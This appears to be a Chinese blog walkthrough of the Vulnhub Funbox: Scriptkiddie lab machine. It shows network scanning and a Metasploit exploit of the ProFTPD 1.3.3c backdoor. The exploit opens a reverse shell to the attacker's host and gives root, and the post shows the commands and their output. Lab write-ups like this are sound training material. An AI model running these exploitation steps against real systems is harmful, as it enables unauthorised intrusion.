首页 > 其他分享 >Vulnhub Funbox靶机攻略(比较简单)

Vulnhub Funbox靶机攻略(比较简单)

时间:2022-10-24 22:13:24浏览次数:100  
标签:__ Funbox Jul unix Vulnhub xr 靶机 root 2021

Funbox

识别目标主机的IP地址

靶机地址:http://www.vulnhub.com/entry/funbox-scriptkiddie,725/

(kali㉿kali)-[~/Vulnhub/Funbox]
└─$ sudo netdiscover -i eth1
 Currently scanning: 192.168.117.0/16   |   Screen View: Unique Hosts       
                                                                            
 4 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 240            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.100  08:00:27:0f:0c:75      2     120  PCS Systemtechnik GmbH   
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor           
 192.168.56.134  08:00:27:79:a1:cf      1      60  PCS Systemtechnik GmbH 

利用Kali Linux内置的netdiscover工具识别目标主机的IP地址为192.168.56.134

NMAP 扫描

─(kali㉿kali)-[~/Vulnhub/Funbox]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.134 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-24 07:34 EDT
Nmap scan report for bogon (192.168.56.134)
Host is up (0.00024s latency).
Not shown: 65527 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         ProFTPD 1.3.3c
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a6:0e:30:35:3b:ef:43:44:f5:1c:d7:c6:58:64:09:92 (RSA)
|   256 c2:d8:bd:62:bf:13:89:28:f8:61:e0:a6:c4:f7:a5:bf (ECDSA)
|_  256 12:60:6e:58:ee:f2:bd:9c:ff:b0:35:05:83:08:71:b8 (ED25519)
25/tcp  open  smtp        Postfix smtpd
| ssl-cert: Subject: commonName=funbox11
| Not valid before: 2021-07-19T16:52:14
|_Not valid after:  2031-07-17T16:52:14
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: funbox11, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Funbox: Scriptkiddie
|_http-generator: WordPress 5.7.2
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE SASL PIPELINING UIDL RESP-CODES TOP CAPA
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: IDLE LOGINDISABLEDA0001 more have capabilities ID listed SASL-IR LITERAL+ Pre-login post-login LOGIN-REFERRALS OK IMAP4rev1 ENABLE
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
MAC Address: 08:00:27:79:A1:CF (Oracle VirtualBox virtual NIC)
Service Info: Hosts:  funbox11, FUNBOX11; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -39m59s, deviation: 1h09m16s, median: 0s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2022-10-24T11:34:35
|_  start_date: N/A
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: funbox11
|   NetBIOS computer name: FUNBOX11\x00
|   Domain name: \x00
|   FQDN: funbox11
|_  System time: 2022-10-24T13:34:35+02:00
|_nbstat: NetBIOS name: FUNBOX11, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.94 seconds

信息收集和漏洞挖掘

根据NMAP扫描的结果,由于目标主机运行FTP服务,因此自然的看一下是否允许匿名访问

─(kali㉿kali)-[~/Vulnhub/Funbox]
└─$ ftp 192.168.56.134
Connected to 192.168.56.134.
220 ProFTPD 1.3.3c Server (ProFTPD Default Installation) [192.168.56.134]
Name (192.168.56.134:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password: 
530 Login incorrect.
ftp: Login failed
ftp> quit
221 Goodbye.

结果是不允许匿名访问你,但是根据banner以及NMAP扫描的结果,知道FTP服务的版本为1.3.3C ProFTPd,看一下是否有相关的漏洞,尤其是高危漏洞。

$ searchsploit proftpd 1.3.3c
------------------------------------------- ---------------------------------
 Exploit Title                             |  Path
------------------------------------------- ---------------------------------
ProFTPd 1.3.3c - Compromised Source Backdo | linux/remote/15662.txt
ProFTPd-1.3.3c - Backdoor Command Executio | linux/remote/16921.rb
------------------------------------------- ---------------------------------

结果是积极的,而且用ruby写的模块,就

感觉metasploit有相应的模块

─(kali㉿kali)-[~/Vulnhub/Funbox]
└─$ msfconsole  


                 _---------.                                                 
             .' #######   ;."                                                
  .---,.    ;@             @@`;   .---,..                                    
." @@@@@'.,'@@            @@@@@',.'@@@@ ".                                   
'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;                                   
   `.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'                                   
     "--'.@@@  -.@        @ ,'-   .'--"                                      
          ".@' ; @       @ `.  ;'                                            
            |@@@@ @@@     @    .                                             
             ' @@@ @@   @@    ,                                              
              `.@@@@    @@   .                                               
                ',@@     @   ;           _____________                       
                 (   3 C    )     /|___ / Metasploit! \                      
                 ;@'. __*__,."    \|--- \_____________/                      
                  '(.,...."/                                                 


       =[ metasploit v6.2.9-dev                           ]
+ -- --=[ 2230 exploits - 1177 auxiliary - 398 post       ]
+ -- --=[ 867 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Metasploit can be configured at startup, see 
msfconsole --help to learn more

msf6 > search proftpd

Matching Modules
================

   #  Name                                         Disclosure Date  Rank       Check  Description
   -  ----                                         ---------------  ----       -----  -----------
   0  exploit/linux/misc/netsupport_manager_agent  2011-01-08       average    No     NetSupport Manager Agent Remote Buffer Overflow
   1  exploit/linux/ftp/proftp_sreplace            2006-11-26       great      Yes    ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
   2  exploit/freebsd/ftp/proftp_telnet_iac        2010-11-01       great      Yes    ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
   3  exploit/linux/ftp/proftp_telnet_iac          2010-11-01       great      Yes    ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
   4  exploit/unix/ftp/proftpd_modcopy_exec        2015-04-22       excellent  Yes    ProFTPD 1.3.5 Mod_Copy Command Execution
   5  exploit/unix/ftp/proftpd_133c_backdoor       2010-12-02       excellent  No     ProFTPD-1.3.3c Backdoor Command Execution


Interact with a module by name or index. For example info 5, use 5 or use exploit/unix/ftp/proftpd_133c_backdoor                                          

msf6 > use exploit/unix/ftp/proftpd_133c_backdoor

msf6 exploit(unix/ftp/proftpd_133c_backdoor) > show options 

Module options (exploit/unix/ftp/proftpd_133c_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), see https://githu
                                      b.com/rapid7/metasploit-framework/wik
                                      i/Using-Metasploit
   RPORT   21               yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set RHOSTS  192.168.56.134
RHOSTS => 192.168.56.134
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > exploit

[-] 192.168.56.134:21 - Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set payload /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::NAME

cmd/unix/
set payload cmd/unix/bind_perl
set payload cmd/unix/bind_perl_ipv6
set payload cmd/unix/generic
set payload cmd/unix/reverse
set payload cmd/unix/reverse_bash_telnet_ssl
set payload cmd/unix/reverse_perl
set payload cmd/unix/reverse_perl_ssl
set payload cmd/unix/reverse_ssl_double_telnet
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set payload cmd/unix/
set payload cmd/unix/bind_perl
set payload cmd/unix/bind_perl_ipv6
set payload cmd/unix/generic
set payload cmd/unix/reverse
set payload cmd/unix/reverse_bash_telnet_ssl
set payload cmd/unix/reverse_perl
set payload cmd/unix/reverse_perl_ssl
set payload cmd/unix/reverse_ssl_double_telnet
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > show options 

Module options (exploit/unix/ftp/proftpd_133c_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  192.168.56.134   yes       The target host(s), see https://githu
                                      b.com/rapid7/metasploit-framework/wik
                                      i/Using-Metasploit
   RPORT   21               yes       The target port (TCP)


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may b
                                     e specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set LHOST  192.168.56.101
LHOST => 192.168.56.101
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set LPORT 5555
LPORT => 5555
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > exploit

[*] Started reverse TCP double handler on 192.168.56.101:5555 
[*] 192.168.56.134:21 - Sending Backdoor Command
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo iINNRrLEUMN9Wbdm;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "iINNRrLEUMN9Wbdm\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.56.101:5555 -> 192.168.56.134:43318) at 2022-10-24 07:42:38 -0400

id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
which python
/usr/bin/python
python -c import 'pty;pty.spawn("/bin/bash")'
  File "<string>", line 1
    import
         ^
SyntaxError: invalid syntax
python -c 'import pty;pty.spawn("/bin/bash")'
root@funbox11:/# ls -alh
ls -alh
total 96K
drwxr-xr-x  23 root root 4.0K Jul 19  2021 .
drwxr-xr-x  23 root root 4.0K Jul 19  2021 ..
drwxr-xr-x   2 root root 4.0K Jul 19  2021 bin
drwxr-xr-x   3 root root 4.0K Jul 19  2021 boot
drwxr-xr-x  18 root root 3.8K Oct 24 13:30 dev
drwxr-xr-x 100 root root 4.0K Jul 19  2021 etc
drwxr-xr-x   3 root root 4.0K Jul 19  2021 home
lrwxrwxrwx   1 root root   33 Jul 19  2021 initrd.img -> boot/initrd.img-4.4.0-210-generic
lrwxrwxrwx   1 root root   33 Jul 19  2021 initrd.img.old -> boot/initrd.img-4.4.0-186-generic
drwxr-xr-x  22 root root 4.0K Jul 19  2021 lib
drwxr-xr-x   2 root root 4.0K Jul 19  2021 lib64
drwx------   2 root root  16K Jul 19  2021 lost+found
drwxr-xr-x   3 root root 4.0K Jul 19  2021 media
drwxr-xr-x   2 root root 4.0K Aug 10  2020 mnt
drwxr-xr-x   2 root root 4.0K Aug 10  2020 opt
dr-xr-xr-x 130 root root    0 Oct 24 13:30 proc
drwx------   4 root root 4.0K Jul 20  2021 root
drwxr-xr-x  26 root root  920 Oct 24 13:30 run
drwxr-xr-x   2 root root  12K Jul 19  2021 sbin
drwxr-xr-x   2 root root 4.0K Jul 19  2021 snap
drwxr-xr-x   2 root root 4.0K Aug 10  2020 srv
dr-xr-xr-x  13 root root    0 Oct 24 13:30 sys
drwxrwxrwt   9 root root 4.0K Oct 24 13:39 tmp
drwxr-xr-x  10 root root 4.0K Jul 19  2021 usr
drwxr-xr-x  14 root root 4.0K Jul 19  2021 var
lrwxrwxrwx   1 root root   30 Jul 19  2021 vmlinuz -> boot/vmlinuz-4.4.0-210-generic
lrwxrwxrwx   1 root root   30 Jul 19  2021 vmlinuz.old -> boot/vmlinuz-4.4.0-186-generic
root@funbox11:/# cd /root
cd /root
root@funbox11:/root# ls -alh
ls -alh
total 48K
drwx------  4 root root 4.0K Jul 20  2021 .
drwxr-xr-x 23 root root 4.0K Jul 19  2021 ..
-rw-------  1 root root    5 Jul 20  2021 .bash_history
-rw-r--r--  1 root root 3.1K Oct 22  2015 .bashrc
drwx------  2 root root 4.0K Jul 19  2021 .cache
-rw-------  1 root root  149 Jul 20  2021 .mysql_history
drwxr-xr-x  2 root root 4.0K Jul 19  2021 .nano
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root 2.3K Jul 20  2021 root.txt
-rw-------  1 root root 4.6K Jul 20  2021 .viminfo
-rw-r--r--  1 root root  167 Oct 24 13:30 .wget-hsts
root@funbox11:/root# cat root.txt
cat root.txt
$$$$$$$$\                  $$\                                                                       
$$  _____|                 $$ |                                                                      
$$ |   $$\   $$\ $$$$$$$\  $$$$$$$\   $$$$$$\  $$\   $$\ $$\                                         
$$$$$\ $$ |  $$ |$$  __$$\ $$  __$$\ $$  __$$\ \$$\ $$  |\__|                                        
$$  __|$$ |  $$ |$$ |  $$ |$$ |  $$ |$$ /  $$ | \$$$$  /                                             
$$ |   $$ |  $$ |$$ |  $$ |$$ |  $$ |$$ |  $$ | $$  $$<  $$\                                         
$$ |   \$$$$$$  |$$ |  $$ |$$$$$$$  |\$$$$$$  |$$  /\$$\ \__|                                        
\__|    \______/ \__|  \__|\_______/  \______/ \__/  \__|                                            
                                                                                                     
                                                                                                     
                                                                                                     
 $$$$$$\                      $$\            $$\     $$\       $$\       $$\       $$\ $$\           
$$  __$$\                     \__|           $$ |    $$ |      \__|      $$ |      $$ |\__|          
$$ /  \__| $$$$$$$\  $$$$$$\  $$\  $$$$$$\ $$$$$$\   $$ |  $$\ $$\  $$$$$$$ | $$$$$$$ |$$\  $$$$$$\  
\$$$$$$\  $$  _____|$$  __$$\ $$ |$$  __$$\\_$$  _|  $$ | $$  |$$ |$$  __$$ |$$  __$$ |$$ |$$  __$$\ 
 \____$$\ $$ /      $$ |  \__|$$ |$$ /  $$ | $$ |    $$$$$$  / $$ |$$ /  $$ |$$ /  $$ |$$ |$$$$$$$$ |
$$\   $$ |$$ |      $$ |      $$ |$$ |  $$ | $$ |$$\ $$  _$$<  $$ |$$ |  $$ |$$ |  $$ |$$ |$$   ____|
\$$$$$$  |\$$$$$$$\ $$ |      $$ |$$$$$$$  | \$$$$  |$$ | \$$\ $$ |\$$$$$$$ |\$$$$$$$ |$$ |\$$$$$$$\ 
 \______/  \_______|\__|      \__|$$  ____/   \____/ \__|  \__|\__| \_______| \_______|\__| \_______|
                                  $$ |                                                               
                                  $$ |                                                               
                                  \__|                                                               

Please, tweet this to: @0815R2d2
Thank you...
root@funbox11:/root# 


很容易就拿到root!!!

标签:__,Funbox,Jul,unix,Vulnhub,xr,靶机,root,2021
From: https://www.cnblogs.com/jason-huawen/p/16823185.html

相关文章

  • Vulnhub Hacksudo靶机超级详细攻击过程
    Hacksudo靶机信息(TargetInformation)目标主机信息:名称:Hacksudo环境Setup:将目标主机的网络模式修改为Host-only,而攻击机KaliLinux的其中一块网卡也设置为host-onl......
  • 靶机: easy_cloudantivirus
    靶机:easy_cloudantivirus准备下载靶机(Target):https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/靶机推荐使用VirtualBox导入,注意以下两个设置显......
  • breakout靶机
    breakout:https://www.vulnhub.com/entry/empire-breakout,751/开机显示ip也可以不用扫描首先使用nmap扫描去访问网页使用dirb扫描这个网页发现并没有什么查看原码......
  • 靶机: medium_socnet
    靶机:medium_socnet准备工作需要你确定的事情:确定kali已经安装,并且能正常使用【本文不涉及kali安装配置】VirtualBox以前能正常导入虚拟文件ova能正常使用下......
  • vulnhub靶场之EMPIRE
    准备:攻击机:虚拟机kali、本机win10。靶机:EMPIRE:BREAKOUT,地址我这里设置的桥接,下载地址:https://download.vulnhub.com/empire/02-Breakout.zip,下载后直接VirtualBox打开,......
  • vulnhub靶场|NAPPING: 1.0.1
    准备:攻击机:虚拟机kali、本机win10。靶机:NAPPING:1.0.1,地址我这里设置的桥接,,下载地址:https://download.vulnhub.com/napping/napping-1.0.1.ova.torrent,下载后直接Virtua......
  • vulnhub靶场之RED: 1
    准备:攻击机:虚拟机kali、本机win10。靶机:RED:1,地址我这里设置的桥接,,下载地址:https://download.vulnhub.com/red/Red.ova,下载后直接VirtualBox打开,如果使用vm打开可能会存......
  • vulnhub靶机 AI WEB 2
    vulnhub靶机AI:WEB:2靶场介绍靶场地址:https://www.vulnhub.com/entry/ai-web-2%2C357/主要内容:文件读取、join爆破、命令注入、命令注入传shell、(隐藏文件)敏感文件......
  • vulnhub靶场之JANGOW: 1.0.1
    准备:攻击机:虚拟机kali、本机win10。靶机:JANGOW:1.0.1,地址我这里设置的桥接,,下载地址:https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova.torrent,下载后直接Virtua......
  • vulnhub靶场之THE PLANETS: EARTH
    准备:攻击机:虚拟机kali、本机win10。靶机:THEPLANETS:EARTH,网段地址我这里设置的桥接,所以与本机电脑在同一网段,下载地址:https://download.vulnhub.com/theplanets/Earth.......